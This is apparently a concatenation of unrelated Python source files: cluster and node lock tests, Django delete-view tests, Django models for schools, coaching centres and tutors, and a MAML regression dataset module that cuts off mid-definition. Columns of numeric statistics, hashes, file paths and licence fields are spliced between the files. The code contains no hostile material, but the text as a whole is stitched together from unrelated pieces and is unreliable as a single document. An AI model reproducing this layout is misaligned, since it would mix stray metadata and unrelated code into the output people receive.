        # BUG FIX: the cluster lock lives under the cluster id (was
        # self.node.id, which trivially succeeded on a fresh lock row).
        observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
        self.assertIn(UUID2, observed)
        self.assertNotIn(action.id, observed)
        # node can be locked again
        observed = db_api.node_lock_acquire(self.node.id, UUID2)
        self.assertEqual(UUID2, observed)
        new_action = db_api.action_get(self.ctx, action.id)
        self.assertEqual('FAILED', new_action.status)
        self.assertEqual("Engine failure", new_action.status_reason)

    def test_delete_cluster_lock_and_node_lock_2(self):
        # Test the case that an action is about a node that also locked a
        # cluster and the cluster lock will remain locked
        #
        # (dead-engine) --> Action --> NodeLock
        #                   |action|owner|  |node |action|
        #                   | A1   | E1  |  |N1   |A1    |
        #                          --> ClusterLock
        #                              |cluster|action  |scope|
        #                              |C1     |[A1, A2]|2    |
        # preparation
        engine_id = UUID1
        action = shared.create_action(self.ctx, target=self.node.id,
                                      status='RUNNING', owner=engine_id,
                                      project=self.ctx.project_id)
        db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
        db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
        db_api.node_lock_acquire(self.node.id, action.id)
        # do it
        db_api.dummy_gc(engine_id)
        # assertion
        # a read lock is okay now and cluster lock state not broken
        observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
        self.assertIn(UUID2, observed)
        self.assertIn(UUID3, observed)
        self.assertNotIn(action.id, observed)
        # node can be locked again
        observed = db_api.node_lock_acquire(self.node.id, UUID2)
        self.assertEqual(UUID2, observed)
        new_action = db_api.action_get(self.ctx, action.id)
        self.assertEqual('FAILED', new_action.status)
        self.assertEqual("Engine failure", new_action.status_reason)

    def test_mult_engine_keep_node_scope_lock(self):
        # One cluster action (engine1) with two dependent node actions on
        # different engines; dummy_gc(engine1) must release only engine1's
        # locks and fail the whole dependency chain.
        engine1 = UUID1
        engine2 = UUID2
        node2 = shared.create_node(self.ctx, self.cluster, self.profile)
        c_action = shared.create_action(self.ctx, target=self.cluster.id,
                                        status='WAITING', owner=engine1,
                                        project=self.ctx.project_id)
        n_action_1 = shared.create_action(self.ctx, target=self.node.id,
                                          status='RUNNING', owner=engine1,
                                          project=self.ctx.project_id)
        n_action_2 = shared.create_action(self.ctx, target=node2.id,
                                          status='RUNNING', owner=engine2,
                                          project=self.ctx.project_id)
        db_api.dependency_add(self.ctx, [n_action_1.id, n_action_2.id],
                              c_action.id)
        db_api.cluster_lock_acquire(self.cluster.id, c_action.id, -1)
        db_api.cluster_lock_acquire(self.cluster.id, n_action_1.id, 1)
        db_api.cluster_lock_acquire(self.cluster.id, n_action_2.id, 1)
        db_api.node_lock_acquire(self.node.id, n_action_1.id)
        db_api.node_lock_acquire(node2.id, n_action_2.id)
        # do it
        db_api.dummy_gc(engine1)
        # try to acquire cluster scope lock
        observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
        self.assertIn(UUID3, observed)
        self.assertEqual(1, len(observed))
        # try to acquire node scope lock
        # NOTE(review): these two acquires use node ids as the cluster-lock
        # key, unlike the cluster-scope acquire above — confirm the intent;
        # they succeed trivially on fresh lock rows.
        UUID4 = uuidutils.generate_uuid()
        observed = db_api.cluster_lock_acquire(self.node.id, UUID4, 1)
        self.assertIn(UUID4, observed)
        self.assertEqual(1, len(observed))
        # node scope lock will be also released
        UUID5 = uuidutils.generate_uuid()
        observed = db_api.cluster_lock_acquire(node2.id, UUID5, 1)
        self.assertIn(UUID5, observed)
        self.assertEqual(1, len(observed))
        # try to acquire node lock
        UUID6 = uuidutils.generate_uuid()
        observed = db_api.node_lock_acquire(self.node.id, UUID6)
        self.assertEqual(UUID6, observed)
        # node locks for actions owned by other engines are still there
        UUID7 = uuidutils.generate_uuid()
        observed = db_api.node_lock_acquire(node2.id, UUID7)
        self.assertNotEqual(UUID7, observed)
        self.assertEqual(n_action_2.id, observed)
        # check dependency
        dependents = db_api.dependency_get_depended(self.ctx, c_action.id)
        self.assertEqual(0, len(dependents))
        # check action status
        new_c_action = db_api.action_get(self.ctx, c_action.id)
        self.assertEqual('FAILED', new_c_action.status)
        self.assertIsNone(new_c_action.owner)
        new_n_action_1 = db_api.action_get(self.ctx, n_action_1.id)
        self.assertEqual('FAILED', new_n_action_1.status)
        self.assertIsNone(new_n_action_1.owner)
        new_n_action_2 = db_api.action_get(self.ctx, n_action_2.id)
        self.assertEqual('FAILED', new_n_action_2.status)
        self.assertIsNone(new_n_action_2.owner)
| 40.640078
| 76
| 0.624539
| 2,580
| 20,889
| 4.860853
| 0.07093
| 0.043059
| 0.074635
| 0.079101
| 0.895702
| 0.889881
| 0.861734
| 0.841719
| 0.835898
| 0.798262
| 0
| 0.01939
| 0.279094
| 20,889
| 513
| 77
| 40.719298
| 0.813401
| 0.158983
| 0
| 0.784566
| 0
| 0
| 0.011501
| 0
| 0
| 0
| 0
| 0
| 0.385852
| 1
| 0.054662
| false
| 0
| 0.016077
| 0
| 0.080386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dba92be26c9de4f86b5981a6feb5526a87d0b0f4
| 4,789
|
py
|
Python
|
sports_manager/tests/team/tests_team_delete_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_delete_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_delete_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# coding=utf-8
"""Tests the views."""
# Django
from django.test import TestCase
from django.urls import reverse
from ..helper import create_team, create_user
class TestTeamUpdateViewAsAnonymous(TestCase):
    """Access tests for the team delete view as an anonymous visitor.

    Everything must be rejected with 403.
    """

    def setUp(self):
        """Create the team used by every test."""
        self.team_info, self.team = create_team()

    def test_get_not_existing(self):
        """GET with an unknown slug is still forbidden (403 before 404)."""
        url = reverse('sports-manager:team-delete', kwargs={'slug': 'not-existing'})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 403)

    def test_get(self):
        """GET on an existing team is forbidden."""
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 403)

    def test_post(self):
        """POST on an existing team is forbidden."""
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        # NOTE(review): team_info is splatted as extra kwargs to post() —
        # confirm `data=self.team_info` was not intended.
        response = self.client.post(url, **self.team_info)
        self.assertEqual(response.status_code, 403)
class TestTeamUpdateViewAsLogged(TestCase):
    """Access tests for the team delete view as a plain logged-in user.

    Everything must be rejected with 403.
    """

    def setUp(self):
        """Create a normal user and the team used by every test."""
        self.user_info = create_user()[0]
        self.team_info, self.team = create_team()

    def _login(self):
        # Log the fixture user in and make sure it worked.
        logged = self.client.login(username=self.user_info['username'],
                                   password=self.user_info['password'])
        self.assertTrue(logged)

    def test_get_not_existing(self):
        """GET with an unknown slug is still forbidden (403 before 404)."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': 'toto'})
        self.assertEqual(self.client.get(url).status_code, 403)

    def test_get(self):
        """GET on an existing team is forbidden."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        self.assertEqual(self.client.get(url).status_code, 403)

    def test_post(self):
        """POST on an existing team is forbidden."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        # NOTE(review): team_info is splatted as extra kwargs to post() —
        # confirm `data=self.team_info` was not intended.
        self.assertEqual(self.client.post(url, **self.team_info).status_code, 403)
class TestTeamUpdateViewAsStaff(TestCase):
    """Access tests for the team delete view as a staff user.

    Staff may view and confirm the deletion.
    """

    def setUp(self):
        """Create a staff user and the team used by every test."""
        self.user_info = create_user(staff=True)[0]
        self.team_info, self.team = create_team()

    def _login(self):
        # Log the staff user in and make sure it worked.
        logged = self.client.login(username=self.user_info['username'],
                                   password=self.user_info['password'])
        self.assertTrue(logged)

    def test_get_not_existing(self):
        """GET with an unknown slug yields 404 for an authorized user."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': 'toto'})
        self.assertEqual(self.client.get(url).status_code, 404)

    def test_get(self):
        """GET renders the confirmation page with the team in context."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.context['team'], self.team)

    def test_post(self):
        """POST deletes the team and redirects to the team list."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        response = self.client.post(url)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response.url, reverse('sports-manager:team-list'))
class TestTeamUpdateViewAsSuperuser(TestCase):
    """Access tests for the team delete view as a superuser.

    Superusers may view and confirm the deletion.
    """

    def setUp(self):
        """Create a superuser and the team used by every test."""
        self.user_info = create_user(superuser=True)[0]
        self.team_info, self.team = create_team()

    def _login(self):
        # Log the superuser in and make sure it worked.
        logged = self.client.login(username=self.user_info['username'],
                                   password=self.user_info['password'])
        self.assertTrue(logged)

    def test_get_not_existing(self):
        """GET with an unknown slug yields 404 for an authorized user."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': 'toto'})
        self.assertEqual(self.client.get(url).status_code, 404)

    def test_get(self):
        """GET renders the confirmation page with the team in context."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.context['team'], self.team)

    def test_post(self):
        """POST deletes the team and redirects to the team list."""
        self._login()
        url = reverse('sports-manager:team-delete', kwargs={'slug': self.team.slug})
        response = self.client.post(url)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(response.url, reverse('sports-manager:team-list'))
| 36.007519
| 116
| 0.644602
| 599
| 4,789
| 5.040067
| 0.106845
| 0.069559
| 0.083471
| 0.111295
| 0.903279
| 0.903279
| 0.903279
| 0.903279
| 0.889367
| 0.889367
| 0
| 0.010264
| 0.18626
| 4,789
| 132
| 117
| 36.280303
| 0.764434
| 0.060347
| 0
| 0.84058
| 0
| 0
| 0.132969
| 0.081967
| 0
| 0
| 0
| 0
| 0.362319
| 1
| 0.231884
| false
| 0.130435
| 0.043478
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
91a0b7b8e71f8fd8403361e9022d1e11cf8bf31e
| 2,279
|
py
|
Python
|
UserAuth/myapp/models.py
|
incomparable1992/django-user-authenications
|
7e6063c86219e757cf8d4215b338f289df024ad1
|
[
"Apache-2.0"
] | null | null | null |
UserAuth/myapp/models.py
|
incomparable1992/django-user-authenications
|
7e6063c86219e757cf8d4215b338f289df024ad1
|
[
"Apache-2.0"
] | 2
|
2020-06-06T01:03:33.000Z
|
2021-06-10T22:25:18.000Z
|
UserAuth/myapp/models.py
|
incomparable1992/django-user-authenications
|
7e6063c86219e757cf8d4215b338f289df024ad1
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
# Create your models here.
class School(models.Model):
    """A school record with contact details and media uploads."""

    name = models.CharField(max_length=30, blank=True, null=True)
    location = models.CharField(max_length=30, blank=True, null=True)
    email = models.EmailField(max_length=30, blank=True, null=True)
    phone = models.BigIntegerField(blank=True, null=True)
    photo = models.FileField(upload_to='image/image', null=True, blank=True, help_text="Upload only .png, .jpg & .jpeg image extension.")
    video = models.FileField(upload_to='image/video', null=True, blank=True, help_text="Upload only mp4, etc..")
    # Plain integer id of the creating user (not a ForeignKey in this schema).
    current_user = models.IntegerField()

    class Meta:
        # NOTE(review): 'shool' is a typo for 'school', but renaming the table
        # requires a migration; left unchanged to avoid breaking existing data.
        db_table = 'shool'
        verbose_name_plural = 'School'
        managed = True

    def __str__(self):
        # BUG FIX: name is nullable; returning None from __str__ raises
        # TypeError. Fall back to an empty string.
        return self.name or ''
class Coaching(models.Model):
    """A coaching centre record with contact details and media uploads."""

    name = models.CharField(max_length=30, blank=True, null=True)
    location = models.CharField(max_length=30, blank=True, null=True)
    email = models.EmailField(max_length=30, blank=True, null=True)
    phone = models.BigIntegerField(blank=True, null=True)
    photo = models.FileField(upload_to='image/image', null=True, blank=True, help_text="Upload only .png, .jpg & .jpeg image extension.")
    video = models.FileField(upload_to='image/video', null=True, blank=True, help_text="Upload only mp4, etc..")
    # Plain integer id of the creating user (not a ForeignKey in this schema).
    current_user = models.IntegerField()

    class Meta:
        db_table = 'coaching'
        verbose_name_plural = 'Coaching'
        managed = True

    def __str__(self):
        # BUG FIX: name is nullable; returning None from __str__ raises
        # TypeError. Fall back to an empty string.
        return self.name or ''
class Tutor(models.Model):
    """A tutor record with contact details and media uploads."""

    name = models.CharField(max_length=30, blank=True, null=True)
    location = models.CharField(max_length=30, blank=True, null=True)
    email = models.EmailField(max_length=30, blank=True, null=True)
    phone = models.BigIntegerField(blank=True, null=True)
    photo = models.FileField(upload_to='image/image', null=True, blank=True, help_text="Upload only .png, .jpg & .jpeg image extension.")
    video = models.FileField(upload_to='image/video', null=True, blank=True, help_text="Upload only mp4, etc..")
    # Plain integer id of the creating user (not a ForeignKey in this schema).
    current_user = models.IntegerField()

    class Meta:
        db_table = 'tutor'
        verbose_name_plural = 'Tutor'
        managed = True

    def __str__(self):
        # BUG FIX: name is nullable; returning None from __str__ raises
        # TypeError. Fall back to an empty string.
        return self.name or ''
| 39.293103
| 137
| 0.694164
| 306
| 2,279
| 5.022876
| 0.176471
| 0.1054
| 0.101496
| 0.132726
| 0.898504
| 0.898504
| 0.898504
| 0.898504
| 0.875732
| 0.823683
| 0
| 0.01123
| 0.179465
| 2,279
| 57
| 138
| 39.982456
| 0.810695
| 0.010531
| 0
| 0.767442
| 0
| 0
| 0.137594
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069767
| false
| 0
| 0.023256
| 0.069767
| 0.790698
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
37e867d1e54d53cb6b81167b8f4eda624240c5d5
| 23,878
|
py
|
Python
|
maml/datasets/simple_functions.py
|
vuoristo/MMAML-Regression
|
1a8bea4d60461d8814e3c9f91427ed56378716ce
|
[
"MIT"
] | 13
|
2020-01-04T01:58:29.000Z
|
2022-02-26T14:37:15.000Z
|
maml/datasets/simple_functions.py
|
vuoristo/MMAML-Regression
|
1a8bea4d60461d8814e3c9f91427ed56378716ce
|
[
"MIT"
] | 1
|
2020-12-10T10:46:51.000Z
|
2020-12-13T19:31:38.000Z
|
maml/datasets/simple_functions.py
|
vuoristo/MMAML-Regression
|
1a8bea4d60461d8814e3c9f91427ed56378716ce
|
[
"MIT"
] | 3
|
2020-06-22T16:55:29.000Z
|
2021-12-06T20:54:37.000Z
|
import torch
import numpy as np
from maml.datasets.metadataset import Task
def generate_sinusoid_batch(amp_range, phase_range, input_range, num_samples,
                            batch_size, oracle, bias=0):
    """Sample a batch of sinusoid tasks y = amp * sin(x - phase) + bias.

    Returns (inputs, outputs, amp, phase); inputs/outputs have shape
    (batch_size, num_samples, 1). With oracle=True the per-task amp and
    phase are appended as two extra input channels.
    """
    amp = np.random.uniform(amp_range[0], amp_range[1], [batch_size])
    phase = np.random.uniform(phase_range[0], phase_range[1], [batch_size])
    outputs = np.zeros([batch_size, num_samples, 1])
    inputs = np.zeros([batch_size, num_samples, 1])
    for task in range(batch_size):
        xs = np.random.uniform(input_range[0], input_range[1],
                               [num_samples, 1])
        inputs[task] = xs
        outputs[task] = amp[task] * np.sin(xs - phase[task]) + bias
    if oracle:
        # Expose the task parameters to the model as extra channels.
        amp_feat = np.ones_like(inputs) * amp.reshape(-1, 1, 1)
        phase_feat = np.ones_like(inputs) * phase.reshape(-1, 1, 1)
        inputs = np.concatenate((inputs, amp_feat, phase_feat), axis=2)
    return inputs, outputs, amp, phase
def generate_linear_batch(slope_range, intersect_range, input_range,
                          num_samples, batch_size, oracle):
    """Sample a batch of linear tasks y = slope * x + intersect.

    Returns (inputs, outputs, slope, intersect); inputs/outputs have shape
    (batch_size, num_samples, 1). With oracle=True the per-task slope and
    intersect are appended as two extra input channels.
    """
    slope = np.random.uniform(slope_range[0], slope_range[1], [batch_size])
    intersect = np.random.uniform(intersect_range[0], intersect_range[1],
                                  [batch_size])
    outputs = np.zeros([batch_size, num_samples, 1])
    inputs = np.zeros([batch_size, num_samples, 1])
    for task in range(batch_size):
        xs = np.random.uniform(input_range[0], input_range[1],
                               [num_samples, 1])
        inputs[task] = xs
        outputs[task] = xs * slope[task] + intersect[task]
    if oracle:
        # Expose the task parameters to the model as extra channels.
        slope_feat = np.ones_like(inputs) * slope.reshape(-1, 1, 1)
        intersect_feat = np.ones_like(inputs) * intersect.reshape(-1, 1, 1)
        inputs = np.concatenate((inputs, slope_feat, intersect_feat), axis=2)
    return inputs, outputs, slope, intersect
class SimpleFunctionDataset(object):
    """Base class for meta-datasets of simple 1-D regression functions.

    Subclasses implement _generate_batch() to sample a meta-batch of tasks;
    iterating the dataset yields (train_tasks, val_tasks) pairs where each
    task's samples are split val-first by _num_val_samples.
    """

    def __init__(self, num_total_batches=200000, num_samples_per_function=5,
                 num_val_samples=5, meta_batch_size=75, oracle=False,
                 train=True, device='cpu', dtype=torch.float, **kwargs):
        self._num_total_batches = num_total_batches
        self._num_samples_per_function = num_samples_per_function
        self._num_val_samples = num_val_samples
        self._num_total_samples = num_samples_per_function
        self._meta_batch_size = meta_batch_size
        self._oracle = oracle
        self._train = train
        self._device = device
        self._dtype = dtype

    def _generate_batch(self):
        """Return (inputs, outputs, infos) for one meta-batch; subclass hook."""
        raise NotImplementedError('Subclass should implement _generate_batch')

    def __iter__(self):
        split = self._num_val_samples
        for _ in range(self._num_total_batches):
            inputs, outputs, infos = self._generate_batch()
            train_tasks = []
            val_tasks = []
            for idx in range(self._meta_batch_size):
                xs = torch.tensor(
                    inputs[idx], device=self._device, dtype=self._dtype)
                ys = torch.tensor(
                    outputs[idx], device=self._device, dtype=self._dtype)
                info = infos[idx]
                # First `split` samples form the validation task, the rest
                # form the training task.
                train_tasks.append(Task(xs[split:], ys[split:], info))
                val_tasks.append(Task(xs[:split], ys[:split], info))
            yield train_tasks, val_tasks
class BiasedSinusoidMetaDataset(SimpleFunctionDataset):
    """Meta-dataset of sinusoid tasks y = amp * sin(x - phase) + bias."""

    def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
                 input_range=[-5.0, 5.0], bias=0, **kwargs):
        super(BiasedSinusoidMetaDataset, self).__init__(**kwargs)
        self._amp_range = amp_range
        self._phase_range = phase_range
        self._input_range = input_range
        self._bias = bias
        # Oracle mode appends amp and phase as two extra input channels.
        self.input_size = 3 if self._oracle else 1
        self.output_size = 1

    def _generate_batch(self):
        inputs, outputs, amps, phases = generate_sinusoid_batch(
            amp_range=self._amp_range, phase_range=self._phase_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=self._meta_batch_size, oracle=self._oracle, bias=self._bias)
        infos = [{'task_id': 0, 'amp': a, 'phase': p}
                 for a, p in zip(amps, phases)]
        return inputs, outputs, infos
class SinusoidMetaDataset(SimpleFunctionDataset):
    """Meta-dataset of sinusoid tasks y = amp * sin(x - phase)."""

    def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
                 input_range=[-5.0, 5.0], **kwargs):
        super(SinusoidMetaDataset, self).__init__(**kwargs)
        self._amp_range = amp_range
        self._phase_range = phase_range
        self._input_range = input_range
        # Oracle mode appends amp and phase as two extra input channels.
        self.input_size = 3 if self._oracle else 1
        self.output_size = 1

    def _generate_batch(self):
        inputs, outputs, amps, phases = generate_sinusoid_batch(
            amp_range=self._amp_range, phase_range=self._phase_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=self._meta_batch_size, oracle=self._oracle)
        infos = [{'task_id': 0, 'amp': a, 'phase': p}
                 for a, p in zip(amps, phases)]
        return inputs, outputs, infos
class LinearMetaDataset(SimpleFunctionDataset):
    """Meta-dataset of linear tasks y = slope * x + intersect."""

    def __init__(self, slope_range=[-3.0, 3.0], intersect_range=[-3, 3],
                 input_range=[-5.0, 5.0], **kwargs):
        super(LinearMetaDataset, self).__init__(**kwargs)
        self._slope_range = slope_range
        self._intersect_range = intersect_range
        self._input_range = input_range
        # Oracle mode appends slope and intersect as two extra input channels.
        self.input_size = 3 if self._oracle else 1
        self.output_size = 1

    def _generate_batch(self):
        inputs, outputs, slopes, intersects = generate_linear_batch(
            slope_range=self._slope_range,
            intersect_range=self._intersect_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=self._meta_batch_size, oracle=self._oracle)
        infos = [{'task_id': 0, 'slope': s, 'intersect': c}
                 for s, c in zip(slopes, intersects)]
        return inputs, outputs, infos
def generate_quadratic_batch(center_range, bias_range, sign_range, input_range,
                             num_samples, batch_size, oracle):
    """Sample a batch of quadratic tasks y = sign * (x - center)^2 + bias.

    `sign` is a magnitude drawn from sign_range given a random direction
    (+1 or -1). Returns (inputs, outputs, sign, center, bias). With
    oracle=True the per-task center and bias are appended as extra
    input channels.
    """
    center = np.random.uniform(center_range[0], center_range[1], [batch_size])
    bias = np.random.uniform(bias_range[0], bias_range[1], [batch_size])
    # Magnitude of the quadratic coefficient.
    alpha = np.random.uniform(sign_range[0], sign_range[1], [batch_size])
    # Random direction in {-1, +1}: randint(2) gives {0, 1}; map to {-1, +1}.
    direction = np.random.randint(2, size=[batch_size]) * 2 - 1
    sign = alpha * direction
    outputs = np.zeros([batch_size, num_samples, 1])
    inputs = np.zeros([batch_size, num_samples, 1])
    for task in range(batch_size):
        xs = np.random.uniform(input_range[0], input_range[1],
                               [num_samples, 1])
        inputs[task] = xs
        outputs[task] = sign[task] * (xs - center[task]) ** 2 + bias[task]
    if oracle:
        # Expose the task parameters to the model as extra channels.
        center_feat = np.ones_like(inputs) * center.reshape(-1, 1, 1)
        bias_feat = np.ones_like(inputs) * bias.reshape(-1, 1, 1)
        inputs = np.concatenate((inputs, center_feat, bias_feat), axis=2)
    return inputs, outputs, sign, center, bias
class QuadraticMetaDataset(SimpleFunctionDataset):
    """ Quadratic function like: sign * (x - center)^2 + bias
    """

    def __init__(self, center_range=[-3.0, 3.0], bias_range=[-3, 3], sign_range=[0.02, 0.15],
                 input_range=[-5.0, 5.0], **kwargs):
        super(QuadraticMetaDataset, self).__init__(**kwargs)
        self._center_range = center_range
        self._bias_range = bias_range
        self._input_range = input_range
        self._sign_range = sign_range
        # Oracle mode appends center and bias as two extra input channels.
        self.input_size = 3 if self._oracle else 1
        self.output_size = 1

    def _generate_batch(self):
        inputs, outputs, signs, centers, biases = generate_quadratic_batch(
            center_range=self._center_range,
            bias_range=self._bias_range,
            sign_range=self._sign_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=self._meta_batch_size, oracle=self._oracle)
        infos = [{'task_id': 2, 'sign': s, 'center': c, 'bias': b}
                 for s, c, b in zip(signs, centers, biases)]
        return inputs, outputs, infos
class MixedFunctionsMetaDataset(SimpleFunctionDataset):
    """Meta-dataset mixing sinusoid (task 0) and linear (task 1) tasks,
    half of each per meta-batch, with optional label noise."""

    def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
                 input_range=[-5.0, 5.0], slope_range=[-3.0, 3.0],
                 intersect_range=[-3.0, 3.0], task_oracle=False,
                 noise_std=0, **kwargs):
        super(MixedFunctionsMetaDataset, self).__init__(**kwargs)
        self._amp_range = amp_range
        self._phase_range = phase_range
        self._slope_range = slope_range
        self._intersect_range = intersect_range
        self._input_range = input_range
        self._task_oracle = task_oracle
        self._noise_std = noise_std
        # Base channel count (1, or 3 with parameter oracle) plus one
        # task-identity channel when the task oracle is on.
        self.input_size = (3 if self._oracle else 1) + (1 if self._task_oracle else 0)
        self.output_size = 1
        self.num_tasks = 2

    def _generate_batch(self):
        half_batch_size = self._meta_batch_size // 2
        # First half: sinusoid tasks (task_id 0).
        sin_inputs, sin_outputs, amp, phase = generate_sinusoid_batch(
            amp_range=self._amp_range, phase_range=self._phase_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=half_batch_size, oracle=self._oracle)
        sin_task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
                          for i in range(len(amp))]
        if self._task_oracle:
            # Task-identity channel: 0 for sinusoid tasks.
            indicator = np.zeros(sin_inputs.shape[:2] + (1,))
            sin_inputs = np.concatenate((sin_inputs, indicator), axis=2)
        # Second half: linear tasks (task_id 1).
        lin_inputs, lin_outputs, slope, intersect = generate_linear_batch(
            slope_range=self._slope_range,
            intersect_range=self._intersect_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=half_batch_size, oracle=self._oracle)
        lin_task_infos = [{'task_id': 1, 'slope': slope[i], 'intersect': intersect[i]}
                          for i in range(len(slope))]
        if self._task_oracle:
            # Task-identity channel: 1 for linear tasks.
            indicator = np.ones(lin_inputs.shape[:2] + (1,))
            lin_inputs = np.concatenate((lin_inputs, indicator), axis=2)
        inputs = np.concatenate((sin_inputs, lin_inputs))
        outputs = np.concatenate((sin_outputs, lin_outputs))
        if self._noise_std > 0:
            outputs = outputs + np.random.normal(scale=self._noise_std, size=outputs.shape)
        task_infos = sin_task_infos + lin_task_infos
        return inputs, outputs, task_infos
class ManyFunctionsMetaDataset(SimpleFunctionDataset):
    """Meta-dataset mixing sinusoid (0), linear (1) and quadratic (2) tasks,
    one third of each per meta-batch, with optional label noise."""

    def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
                 input_range=[-5.0, 5.0], slope_range=[-3.0, 3.0],
                 intersect_range=[-3.0, 3.0], center_range=[-3.0, 3.0],
                 bias_range=[-3.0, 3.0], sign_range=[0.02, 0.15], task_oracle=False,
                 noise_std=0, **kwargs):
        super(ManyFunctionsMetaDataset, self).__init__(**kwargs)
        self._amp_range = amp_range
        self._phase_range = phase_range
        self._slope_range = slope_range
        self._intersect_range = intersect_range
        self._input_range = input_range
        self._center_range = center_range
        self._bias_range = bias_range
        self._sign_range = sign_range
        self._task_oracle = task_oracle
        self._noise_std = noise_std
        # Base channel count (1, or 3 with parameter oracle) plus one
        # task-identity channel when the task oracle is on.
        self.input_size = (3 if self._oracle else 1) + (1 if self._task_oracle else 0)
        self.output_size = 1
        # NOTE(review): three task families are generated below, but
        # num_tasks is 2 — confirm whether 3 was intended.
        self.num_tasks = 2

    def _generate_batch(self):
        # One third of the meta-batch per task family.
        sub_batch_size = self._meta_batch_size // 3
        # Sinusoid tasks (task_id 0).
        sin_inputs, sin_outputs, amp, phase = generate_sinusoid_batch(
            amp_range=self._amp_range, phase_range=self._phase_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=sub_batch_size, oracle=self._oracle)
        sin_task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
                          for i in range(len(amp))]
        if self._task_oracle:
            sin_inputs = np.concatenate(
                (sin_inputs, np.zeros(sin_inputs.shape[:2] + (1,))), axis=2)
        # Linear tasks (task_id 1).
        lin_inputs, lin_outputs, slope, intersect = generate_linear_batch(
            slope_range=self._slope_range,
            intersect_range=self._intersect_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=sub_batch_size, oracle=self._oracle)
        lin_task_infos = [{'task_id': 1, 'slope': slope[i], 'intersect': intersect[i]}
                          for i in range(len(slope))]
        if self._task_oracle:
            lin_inputs = np.concatenate(
                (lin_inputs, np.ones(lin_inputs.shape[:2] + (1,))), axis=2)
        # Quadratic tasks (task_id 2).
        qua_inputs, qua_outputs, sign, center, bias = generate_quadratic_batch(
            center_range=self._center_range,
            bias_range=self._bias_range,
            sign_range=self._sign_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=sub_batch_size, oracle=self._oracle)
        qua_task_infos = [{'task_id': 2, 'sign': sign[i], 'center': center[i], 'bias': bias[i]}
                          for i in range(len(sign))]
        if self._task_oracle:
            qua_inputs = np.concatenate(
                (qua_inputs, np.ones(qua_inputs.shape[:2] + (1,))), axis=2)
        inputs = np.concatenate((sin_inputs, lin_inputs, qua_inputs))
        outputs = np.concatenate((sin_outputs, lin_outputs, qua_outputs))
        if self._noise_std > 0:
            outputs = outputs + np.random.normal(scale=self._noise_std, size=outputs.shape)
        task_infos = sin_task_infos + lin_task_infos + qua_task_infos
        return inputs, outputs, task_infos
class MultiSinusoidsMetaDataset(SimpleFunctionDataset):
    """Meta-dataset mixing two sinusoid task families that differ only by
    a constant vertical bias (biases[0] for task 0, biases[1] for task 1)."""

    def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi], biases=(-5, 5),
                 input_range=[-5.0, 5.0], task_oracle=False,
                 noise_std=0, **kwargs):
